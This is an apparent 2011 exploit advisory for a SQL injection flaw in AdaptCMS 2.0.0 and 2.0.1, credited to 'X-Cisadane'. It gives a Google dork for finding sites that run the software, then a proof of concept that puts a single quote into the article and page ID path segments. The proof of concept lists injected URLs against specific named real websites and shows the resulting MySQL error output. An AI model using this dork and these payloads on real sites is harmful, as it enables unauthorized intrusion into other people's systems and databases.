========================================================================= AdaptCMS 2.x SQL Injection Vulnerability ========================================================================= :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : AdaptCMS 2.x SQL Injection Vulnerability : # Date : 23 November 2011 : # Author : X-Cisadane : # Software Link : http://www.adaptcms.com : # Version : 2.0.0 and 2.0.1 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome 14.0.835 (Windows) : # Dorks : intext:"Powered by AdaptCMS" OR Powered by AdaptCMS : # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari, Anharku, Array XCrew, Remick Kuzmanovic :-------------------------------------------------------------------------------------------------------------------------: POC : SQL Injection Vulnerability Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 262 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 293 - Open Victim Website : http:////article/ *'Article ID*/Page Name/Article Title Example : http://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update - Open Victim Website : http:////page/*'Page ID*/Page Title Example : http://www.adaptcms.com/page/'33/downloads http://www.rock.insanevisions.com/page/'1/About-Us/ http://www.insanevisions.com/page/'3/Downloads/ -= Regards =- Dwi a.k.a X-Cisadane